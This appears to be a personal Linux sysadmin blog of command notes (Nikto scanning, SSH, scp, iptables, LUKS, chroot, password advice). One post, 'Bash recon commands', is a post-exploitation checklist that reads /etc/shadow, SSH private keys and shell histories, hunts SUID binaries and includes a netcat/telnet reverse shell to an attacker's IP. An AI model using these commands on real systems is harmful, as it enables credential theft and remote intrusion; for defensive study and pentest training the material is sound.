2019-04-16 22:25:24

Nikto (FR)

Nikto c’est quoi?
C’est un scanner de vulnérabilités web écrit en perl et sous licence GPL. Il va permettre de tester la sécurité de la configuration de votre serveur web (les options HTTP, les index,les failles XSS potentielles,injections SQL etc…)

A utiliser uniquement sur ses propres serveurs. Le scan est bruyant,et génère plusieurs dizaines de lignes de logs avec votre IP dans les logs apache ou dans n’importe quel IDS. L’intérêt est de trouver des failles chez soi pour pouvoir sécuriser au mieux nos serveurs webs.

Installation du script
De base il est présent sous la distribution KALI. ici je vais l’installer sur ma raspbian qui héberge un serveur web apache.

La version Nikto v2.1.6 est disponible sur le github:

Télécharger le zip et le décompresser :



cd nikto-master/program

Scan ports WEB (80 et 443)
Par défaut Nikto scan sur le port 80 donc voyons voir plutôt comment faire pour scanner le port HTTPS 443:

./ -h https://[URL]:443/ -F txt -o ScanResultat.txt

Scan multiports
./ -h [URL] -p 8080,80,443

Scan multihosts
Il est possible de scanner une plage d’adresses de serveurs web. Nikto est capable de lire sur son entrée standard. Du coup,on lui donne « à bouffer » le résultat d’un scan nmap :

nmap -p80 -oG – | ./ -h –

Scan verbeux et debug
il faut rajouter l’option -D -v. En reprenant l’exemple précédent ca donne:

./ -h [URL] -p 8080,80,443 -D -v

Derrière un proxy
sudo vim /nikto-master/program/nikto.conf

Préciser le proxy

# Proxy settings -- still must be enabled by -useproxy
PROXYHOST= ip_ou_url_du_proxy
Test du scan avec le proxy paramétré précédemment:

./ -h [URL] -useproxy

Comprendre quelques failles
on va partir du simple résultat de la commande :

nikto -h http://monserveurWeb

Source :

Auteur : tux

Auteur : Harlok

2019-04-03 10:48:39

Cleaning pacman

I strongly suggest the use of paccache instead of pacman -Sc. There is even a very effective flag for removing selectively the versions of uninstalled packages -u. The flags of paccache I recommend are (as part of paccache v5.0.2):

pacman -Sy pacman-contrib

-d, --dryrun: perform a dry run, only finding candidate packages
-r, --remove: remove candidate packages
-u, --uninstalled: target uninstalled packages only
-k, --keep : keep "num" of each package in the cache (default: 3)
Example: Check for remaining cache versions of uninstalled packages
paccache -dvuk0

Auteur : Harlok

2019-05-14 15:03:57

Reverse ssh | Linux | cli

1) destination->source
ssh -R 19999:localhost:22 user@server
ssh user@localhost -p 19999

Auteur : Harlok

2019-04-16 22:03:18

Chrome isolation

Enable Strict Site Isolation in Chrome

Enable Strict Site Isolation via Chrome flags

Open Chrome.
Type chrome://flags in the address bar and hit the Enter key.
Press Ctrl+F and look for Strict Site Isolation.
Click Enable to turn the feature ON.
As you click Enable, a Relaunch Now button will appear.

Relaunch Chrome to make the changes take effect. The browser will relaunch with all your tabs open.

Enable Strict Site Isolation by changing the Target

Right-click the Chrome icon and select Properties.

Under the Shortcut tab, in the ‘Target’ field, paste ‘–site-per-process’ after the quotation marks with space.

So the target should now appear as:
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"

Auteur : Harlok

2018-01-09 17:47:51

bridge up | linux | cli

sudo ip link add name br0 type bridge
sudo ip link set enp8s0f1 master br0
sudo ip link set br0 up
ifconfig enp8s0f1
dhclient br0

Auteur : Harlok

2019-04-16 22:06:56

Mining | cli | Linux

Sudo or as root
sysctl -w vm.nr_hugepages=128

Auteur : Harlok

2019-05-04 21:57:15

SSH KEY | cli | Linux

ssh-keygen -t rsa
Best algorithm is ed25519
Enter file in which to save the key (/home/exemple/.ssh/
ssh-copy-id user@
cat ~/.ssh/ | ssh user@
"mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys"

Auteur : Harlok

2019-04-16 22:03:05

core affinity | cli | linux

View the CPU Affinity of a Running Process

To retrieve the CPU affinity information of a process, use the following format. taskset returns the current CPU affinity in a hexadecimal bitmask format.

taskset -p

For example, to check the CPU affinity of a process with PID 2915:
$ taskset -p 2915

pid 2915's current affinity mask: ff

In this example, the returned affinity (represented in a hexadecimal bitmask) corresponds to "11111111" in binary format, which means the process can run on any of eight different CPU cores (from 0 to 7).

The lowest bit in a hexadecimal bitmask corresponds to core ID 0, the second lowest bit from the right to core ID 1, the third lowest bit to core ID 2, etc. So for example, a CPU affinity "0x11" represents CPU core 0 and 4.

taskset can show CPU affinity as a list of processors instead of a bitmask, which is easier to read. To use this format, run taskset with "-c" option. For example:
$ taskset -cp 2915

pid 2915's current affinity list: 0-7

Pin a Running Process to Particular CPU Core(s)

Using taskset, you can "pin" (or assign) a running process to particular CPU core(s). For that, use the following format.
$ taskset -p
$ taskset -cp

For example, to assign a process to CPU core 0 and 4, do the following.
$ taskset -p 0x11 9030

pid 9030's current affinity mask: ff
pid 9030's new affinity mask: 11

Or equivalently:
$ taskset -cp 0,4 9030

With "-c" option, you can specify a list of numeric CPU core IDs separated by commas, or even include ranges (e.g., 0,2,5,6-10).

Note that in order to be able to change the CPU affinity of a process, a user must have CAP_SYS_NICE capability. Any user can view the affinity mask of a process.
Launch a Program on Specific CPU Cores

taskset also allows you to launch a new program as pinned to specific CPU cores. For that, use the following format.


For example, to launch vlc program on a CPU core 0, use the following command.
$ taskset 0x1 vlc

Dedicate a Whole CPU Core to a Particular Program

While taskset allows a particular program to be assigned to certain CPUs, that does not mean that no other programs or processes will be scheduled on those CPUs. If you want to prevent this and dedicate a whole CPU core to a particular program, you can use "isolcpus" kernel parameter, which allows you to reserve the CPU core during boot.

Add the kernel parameter "isolcpus=" to the boot loader during boot or GRUB configuration file. Then the Linux scheduler will not schedule any regular process on the reserved CPU core(s), unless specifically requested with taskset. For example, to reserve CPU cores 0 and 1, add "isolcpus=0,1" kernel parameter. Upon boot, then use taskset to safely assign the reserved CPU cores to your program.

Auteur : Harlok

2018-01-09 17:45:48



Macvtap is a new device driver meant to simplify virtualized bridged networking. It replaces the combination of the tun/tap and bridge drivers with a single module based on the macvlan device driver. A macvtap endpoint is a character device that largely follows the tun/tap ioctl interface and can be used directly by kvm/qemu and other hypervisors that support the tun/tap interface. The endpoint extends an existing network interface, the lower device, and has its own mac address on the same ethernet segment. Typically, this is used to make both the guest and the host show up directly on the switch that the host is connected to.
VEPA, Bridge and private mode

Like macvlan, any macvtap device can be in one of three modes, defining the communication between macvtap endpoints on a single lower device:

Virtual Ethernet Port Aggregator (VEPA), the default mode: data from one endpoint to another endpoint on the same lower device gets sent down the lower device to external switch. If that switch supports the hairpin mode, the frames get sent back to the lower device and from there to the destination endpoint.

Most switches today do not support hairpin mode, so the two endpoints are not able to exchange ethernet frames, although they might still be able to communicate using an tcp/ip router. A linux host used as the adjacent bridge can be put into hairpin mode by writing to /sys/class/net/dev/brif/port/hairpin_mode. This mode is particularly interesting if you want to manage the virtual machine networking at the switch level. A switch that is aware of the VEPA guests can enforce filtering and bandwidth limits per MAC address without the Linux host knowing about it.

Bridge, connecting all endpoints directly to each other. Two endpoints that are both in bridge mode can exchange frames directly, without the round trip through the external bridge. This is the most useful mode for setups with classic switches, and when inter-guest communication is performance critical.

For completeness, a private mode exists that behaves like a VEPA mode endpoint in the absence of a hairpin aware switch. Even when the switch is in hairpin mode, a private endpoint can never communicate to any other endpoint on the same lowerdev.

Setting up macvtap

A macvtap interface is created an configured using the ip link command from iproute2, in the same way as we configure macvlan or veth interfaces.


$ ip link add link eth1 name macvtap0 type macvtap
$ ip link set macvtap0 address 1a:46:0b:ca:bc:7b up
$ ip link show macvtap0
12: macvtap0@eth1: mtu 1500 qdisc noqueue state UNKNOWN
link/ether 1a:46:0b:ca:bc:7b brd ff:ff:ff:ff:ff:ff

At the same time a character device gets created by udev. Unless configured otherwise, udev names this device /dev/tapn, with n corresponding to the number of network interface index of the new macvtap endpoint, in the above example '12'. Unlike tun/tap, the character device only represents a single network interface, and we can give the ownership to a user or group that we want to be able to use the new tap. Configuring the mac address of the endpoint is important, because this address is used on the external network, the guest is not able to spoof or change that address and has to be configured with the same address.
Qemu on macvtap

Qemu as of 0.12 does not have direct support for macvtap, so we have to (ab)use the tun/tap configuration interface. To start a guest on the interface from the above example, we need to pass the device node as an open file descriptor to qemu and tell it about the mac address. The scripts normally used for bridge configuration must be disabled. A bash redirect can be used to open the character device in read/write mode and pass it as file descriptor 3.

qemu -net nic,model=virtio,addr=1a:46:0b:ca:bc:7b -net tap,fd=3 3<>/dev/tap11

Auteur : Harlok

2019-04-16 22:07:55

Route basic reference, nullrouting, gateway, bridge | Linux | Cli

Print kernel IP routing table :
Add a default gateway :
route add default gw
Kernel IP routing cache :
route -Cn

3 methods to Reject a host (nullroute):
route add -host reject
route add gw lo
ip route add blackhole from

3 methods to Reject a network (nullroute):
route add -net netmask reject
route add -net gw lo
ip route add blackhole

Add a route for a network :
ip route add via

Sow the routing table :
ip route show

Adding a bridge :
ip link add name bridge_name type bridge
Set up :
ip link set bridge_name up
Set eth0 as master :
ip link set eth0 master bridge_name
Unset eht0 as master :
ip link set eth0 nomaster

Auteur : Harlok

2019-05-13 16:55:26

SCP | cli | Linux

Server to client
scp -P port user@server:/path/to/remote/file ./
Client to server

scp -P port /path/to/some/file user@machine:/path/to/location

Path: you must have the write or read rights.


Copy one single local file to a remote destination

scp /path/to/source-file user@host:/path/to/destination-folder/

So, if you wan to copy the file /home/user/table.csv to a remote host named and copy there to jane's home folder, use this command.

scp /home/user/table.csv

Copy one single file from a remote server to your current local server

scp user@host:/path/to/source-file /path/to/destination-folder

Let's say now you want to copy the same file from jane's home folder in to your local home folder.

scp /home/user/

Copy one single file from a remote server to another remote server

With scp you can copy files between remote servers from a third server without the need to ssh into any of them, all weight lifting will be done by scp itself.

scp user1@server1:/path/to/file user2@server2:/path/to/folder/

Let's say now you want to copy the same table file from jane's home folder to pete's home folder in another remote machine.


Copy one single file from a remote host to the same remote host in another location


This time, you will be copying from one host to the same host, but on different folders under the control of different users.

Copy multiple files with one command

You can copy multiple files at once without having to copy all the files in a folder, or copy multiple files from different folders putting them in a space separated list.

scp file1.txt file2.txt file3.txt

If the files are in different folders, just specify the complete path.

scp /path/to/file1.txt /path/to/file2.txt /path/to/file3.txt

Copy all files of a specific type

scp /path/to/folder/*.ext user@server:/path/to/folder/

This will copy all files of a given extension to the remote server. For instance, you want to copy all your text files (txt extension) to a new folder.

scp /home/user/*.txt

You can make use of wildcards in any way you want.

Copy all files in a folder to a remote server

scp /path/to/folder/* user@server:/path/to/folder/

This will copy all files inside local folder to the remote folder, let's see an example.

scp /home/user/html/*

All files in local folder html, will be copied to backup folder in

Copy all files in a folder recursively to a remote server

scp -r /home/user/html/*

Same as the previous example, but this time it will copy all contentes recursively

Copy a folder and all its contents to a remote server

scp -r /path/to/source-folder user@server:/path/to/destination-folder/

This time the folder itself is copied with all its contents and not only the contents. One more time we'll use an example.

scp -r /home/user/html

This will result in having in the remote server this: /home/jane/backup/html/.... The whole html folder and its contentes recursively have been copied to the remote server.

We have seen the basic uses scp, now we will see some special uses and tricks of this great command

Increase Speed

scp uses AES-128 to encrypt data, this is very secure, but also a litle bit slow. If you need more speed and still have security, you can use Blowfish or RC4.

To increase scp speed change chipher from the default AES-128 to Blowfish

scp -c blowfish user@server:/home/user/file .

Or use RC4 which seems to be the fastest

scp -c arcfour user@server:/home/user/file .

This last one is not very secure, and it may not be used if security is really an issue for you.

Increase Security

If security is what you want, you can increase it, you will lose some speed though.

scp -c 3des user@server:/home/user/file .

Limit Bandwidth

You may limit the bandwidth used by scp command

scp -l limit username@server:/home/uername/* .

Where limit is specified in Kbit/s. So for example, if you want to limit speed at 50 Kbps

scp -l50 user@server:/path/to/file /path/to/folder

Save Bandwidth

Yoy can save bandwidth by enabling compression, let's see our example with compression.

scp -C user@server:/path/to/file /path/to/folder

Use IPv4 or IPv6

If you want to force the use of either IPv4 or IPv6 use any of these ones.

scp -4 user@server:/path/to/file /path/to/folder

The above one is for IPv4, and below for IPv6.

scp -6 user@server:/path/to/file /path/to/folder

Specify a port

If the remote server does not have ssh listening on default 22 port, you can make scp to use the port where the remote server is listening to:

scp -P [port] [user]@[server]:[path/to/]file [/path/to/]file

Using the capital letter P you can make scp to use a port other than 22 which is the default for ssh. Let's say your remote server is listening on 2222.

scp -P 2222 user@server:/home/jane/file /home/jane/

Use verbose output

If you want to see what is happening under the hood, use the -v parameter for a verbose output

scp -v user@server:/home/jane/file /home/jane/


If you are working on a Windows powered computer, you can still enjoy scp in various ways, of course if you are a "*nix guy" you will prefer the command line, and you also have GUI tools available.

pscp is a shell command that works almost on Windows Shell almost the same way that scp works on Linux or Mac OS X, you first need to download it from this page, here is the direct link.

Once downloaded you can invoque it from the Windows command line, go to the start menu and click on run then write


And press ENTER, if you are on Windows 8.x hit the Windows/Super key and click on the magnifier lens, type cmd and hit ENTER.

Once in the command line, be sure to be in the directory where the pscp file was downloaded, or add that folder to your PATH, let's suppose the folder is your Downloads folder, run this command:

SET PATH=C:\Users\Guillermo\Downloads;%PATH%

You will have to set that command every time you open a new command shell, or you can add the path permanently, how to do that is out of the scope of this article.

Below are the options of the command, you will see that the options available let you do almost everything.

PuTTY Secure Copy client
Release 0.63
Usage: pscp [options] [user@]host:source target
pscp [options] source [source...] [user@]host:target
pscp [options] -ls [user@]host:filespec
-V print version information and exit
-pgpfp print PGP key fingerprints and exit
-p preserve file attributes
-q quiet, don't show statistics
-r copy directories recursively
-v show verbose messages
-load sessname Load settings from saved session
-P port connect to specified port
-l user connect with specified username
-pw passw login with specified password
-1 -2 force use of particular SSH protocol version
-4 -6 force use of IPv4 or IPv6
-C enable compression
-i key private key file for authentication
-noagent disable use of Pageant
-agent enable use of Pageant
-batch disable all interactive prompts
-unsafe allow server-side wildcards (DANGEROUS)
-sftp force use of SFTP protocol
-scp force use of SCP protocol

Copy files from Windows to Linux

You can use scp command to copy files from Linux to Windows

pscp c:\path\to\file user@remote-server:/path/to/remote-folder

Copy files from Linux to Windows

You can also copy files from Windows to Linux, using pscp from the Windows computer you can "push" the files to the Linux, Max OS X or *BSD server.

pscp user@remote-server:/path/to/remote-file c:\path\to\local-folder\

Specify protocol

You can specify the protocol that scp command for Windows will use at the time of connection.

This will force pscp to use scp protocol
This will force pscp to use sftp protocol, which is a newer protocol than scp protocol

Auteur : Harlok

2019-04-16 22:02:52

Laptop Lid tuning | linux | cli

Sometimes you will have problems with lid open close on laptop

Edit /etc/systemd/logind.conf and make sure you have,

You can change ignore by suspend, poweroff
which will make it ignore the lid being closed. (You may need to also undo the other changes you've made).

Then, you'll want to reload logind.conf to make your changes go into effect (thanks to Ehtesh Choudhury for pointing this out in the comments):

systemctl restart systemd-logind
Full details over at the archlinux Wiki.

The man page for logind.conf also has the relevant information,


Controls whether logind shall handle the system power and sleep
keys and the lid switch to trigger actions such as system power-off
or suspend. Can be one of ignore, poweroff, reboot, halt, kexec,
suspend, hibernate, hybrid-sleep and lock. If ignore logind will
never handle these keys. If lock all running sessions will be
screen locked. Otherwise the specified action will be taken in the
respective event. Only input devices with the power-switch udev tag
will be watched for key/lid switch events. HandlePowerKey=
defaults to poweroff. HandleSuspendKey= and HandleLidSwitch=
default to suspend. HandleHibernateKey= defaults to hibernate.

Auteur : Harlok

2019-05-13 16:47:48

How to Deploy a Symfony Website to Prod


create the symfony folder with all the Website (generally in /var/www)

change right first to a non admin/sudo user :
# sudo chown -R user: user /var/www/symfony
Allow the user www-data access to the files inside the application folder. Give this user a read + execute permission (rX) in the whole directory.
# sudo setfacl -R -m u:www-data:rX symfony
Give read + write + execute permissions (rwX) to the user www-data in order to enable the web server to write only in these directories.
# sudo setfacl -R -m u:www-data:rwX symfony/var/cache symfony/var/logs
Finally, we will define that all new files created inside the app/cache and app/logs folders follow the same permission schema we just defined, with read, write, and execute permissions to the web server user. This is done by repeating the setfacl command we just ran, but this time adding the -d option.

# sudo setfacl -dR -m u:www-data:rwX symfony/var/cache symfony/var/logs

# export SYMFONY_ENV=prod
# composer install --no-dev --optimize-autoloader
# php bin/console doctrine:schema:validate
# php bin/console doctrine:schema:create
# php bin/console cache:clear --env=prod --no-debug

Bonux : create a swap file for VPS
# dd if=/dev/zero of=/var/swap.img bs=1024k count=1000
# mkswap /var/swap.img
# swapon /var/swap.img
# echo "/var/swap.img none swap sw 0 0" >> /etc/fstab

Auteur : Harlok

2019-04-16 22:17:58

How to Chroot

prepare the folder :
mount /device/to/chroot /chroot/point
If necessary :
mount /device/of/boot /chroot/point/boot
export PATH="$PATH:/usr/sbin:/sbin:/bin"
cd /location/of/new/root
# mount -t proc proc proc/
# mount --rbind /sys sys/
# mount --rbind /dev dev/
And optionally:
# mount --rbind /run run/
Next, in order to use an internet connection in the chroot environment copy over the DNS details:
# cp /etc/resolv.conf etc/resolv.conf
Finally, to change root into /location/of/new/root using a bash shell:

As a User
#chroot /chroot /bin/su - user
#chroot --userspec=user:user --groups=group1 /chroot /bin/bash
As Root
# chroot /location/of/new/root /bin/bash
export PATH="$PATH:/usr/sbin:/sbin:/bin"

# xhost +local:

# echo $DISPLAY
as the user that owns the X server to see the value of DISPLAY. If the value is ":0" (for example), then in the chroot environment run

# export DISPLAY=:0

Auteur : Harlok

2019-04-26 09:57:44

Strong Password Policy

What are weak password ?
that's a weak password :
-> Upper case at the beginning
-> Short
-> Number at the end
-> Some tools like Hydra or haschcat can crack this in a second with rainbow table

Good password are random char
advantages :
-> Hard to online crack
-> Long
-> No upper case at the beginning
-> No number at the end
-> Require a lot of computer power to crack
-> Need to brute force it wont work with dictionary attacks

that's good but not perfect :
-> Hard to remember
-> Hard to type
-> Not really future proof

Perfect Password are :
Why :
-> It's long
-> No upper case at the beginning
-> Special chars
-> No Number at the end
-> Easy to type
-> Easy to remember
-> Plus if you can write in an another language than English it's harder to crack
-> Future proof
-> Hard to offline and online crack

!! Remember Activate 2FA when it's possible !!

Auteur : Harlok

2019-04-16 21:52:32

SSH Dynamic Tunnel | cli | Linux

## Dynamic Tunnel ##
ssh -D 25000 -f -C -q -N

-D: Tells SSH that we want a SOCKS tunnel on the specified port number (you can choose a number between 1025-65536)
-f: Forks the process to the background
-C: Compresses the data before sending it
-q: Uses quiet mode
-N: Tells SSH that no command will be sent once the tunnel is up
-L local listening
-R Server listening
-p port on distant machine

Auteur : Harlok

2019-04-26 09:30:52

Iptables examples | cli | Linux

### Flush, append a few rules, than drop & save ###
iptables -F
iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP
iptables -A INPUT -p tcp ! --syn -m state --state NEW -j DROP
iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -I INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -P INPUT DROP

iptables-save | sudo tee /etc/iptables

/sbin/iptables -A OUTPUT -p tcp --dport {PORT-NUMBER-HERE} -j DROP

### interface section use eth1 ###
/sbin/iptables -A OUTPUT -o eth1 -p tcp --dport {PORT-NUMBER-HERE} -j DROP

### only drop port for given IP or Subnet ##

/sbin/iptables -A OUTPUT -o eth0 -p tcp --destination-port {PORT-NUMBER-HERE} -s {IP-ADDRESS-HERE} -j DROP
/sbin/iptables -A OUTPUT -o eth0 -p tcp --destination-port {PORT-NUMBER-HERE} -s {IP/SUBNET-HERE} -j DROP
/sbin/iptables -A OUTPUT -p tcp -d --dport 1234 -j DROP
/sbin/service iptables save

# Logging #
### If you would like to log dropped packets to syslog, first log it ###
/sbin/iptables -A INPUT -m limit --limit 5/min -j LOG --log-prefix "PORT 80 DROP: " --log-level 7

### now drop it ###
/sbin/iptables -A INPUT -p tcp --destination-port 80 -j DROP

/sbin/iptables -A INPUT -s -i eth1 -p udp -m state --state NEW -m udp --dport 161 -j DROP

# drop students subnet to port 80
/sbin/iptables -A INPUT -s -i eth1 -p tcp -m state --state NEW -m tcp --dport 80 -j DROP

Auteur : Harlok

2019-04-26 09:28:32

Bash recon commands

cat /proc/1/status | grep Name
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release # Debian based
cat /etc/redhat-release # Redhat based
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
lpstat -a // printer
ps aux
ps -ef
cat /etc/services
ps aux | grep root
ps -ef | grep root
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
arp -e
/sbin/route -nee

tcpdump tcp dst 80 and tcp dst 21
tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Ouput (Results)
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!

cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l

cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

ls -ahlR /root/
ls -ahlR /home/

cat /var/apache2/
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

cat ~/.ssh/authorized_keys
cat ~/.ssh/
cat ~/.ssh/identity
cat ~/.ssh/
cat ~/.ssh/id_rsa
cat ~/.ssh/
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/
cat /etc/ssh/ssh_host_key

ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other

find /etc/ -readable -type f 2>/dev/null # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone

ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log,, mail.log, mail.warn, messages, syslog, udev, wtmp

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i

df -h

cat /etc/fstab

find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o w -type d 2>/dev/null # world-writeable folders

find / -perm -o x -type d 2>/dev/null # world-executable folders

find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable files
find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files

find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc

find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp

find . -user user -group group
find . -size 1000c #c bytes b block w word k kilobytes M G

Auteur : Harlok

2020-03-11 20:51:45

Luks | cli | Linux

Set a UUID for the LUKS partition:
cryptsetup luksUUID --uuid "" /dev/sdxX
Open a LUKS device:
cryptsetup luksOpen
dmsetup info
Create quickly a key:
dd if=/dev/urandom of=$HOME/keyfile bs=32 count=1 chmod 600 $HOME/keyfile
Add a key for device :
cryptsetup luksAddKey ~/keyfile
Remove a device key:
cryptsetup luksRemoveKey
Close the volume group:
lvchange -a n My_vg_crypt cryptsetup -v
Close the LUKS device:
luksClose My_Crypt luks-bxxaccxx-xxxd-4f3a-xxxx-16965ea084d1

Auteur : Harlok

2019-04-26 09:57:40

The Best Linux Distributions For Workstation's

Well why you should stick with it :
- to install it quickly
- to get frequent system and packets update
- for a stable environment
- to get used to the most used ;-)

Some say you could work with others distribution.
It's up to you.

1) Fedora
Based on red hat, it is very stable, well documented, easy to install. It has SELINUX very good for security.

2)Open Suse
Is a distribution oriented on developers, sysadmins,
But easy to use and easy to install. SELINUX too.

3) Ubuntu
Is for the beginner, oriented to people who need a lot of graphical apps. Stable too and easy to install.

4) Arch Linux
Why Arch for Workstation's?
Well it's not for beginners.
Once you know what you do, no problems a great distribution, very well documented.
For Workstation's you should go for linux-lts kernel.
Use lvm and make snapshots.

Debian is stable but some packets updates are slow to come. It's a great distribution though it's great for servers

Auteur : Harlok

2019-05-04 21:54:13

Hi, and welcome to my blog!

Hi all and Welcome, please feel free to post any comment but be respectful please!
The purpose of this blog is to remember me commands and great articles I use for Linux and Dev.
If an article belong to you please let me know I will add your name and a link to your website.
Have a nice day!

Auteur : Harlok

2019-04-26 16:10:59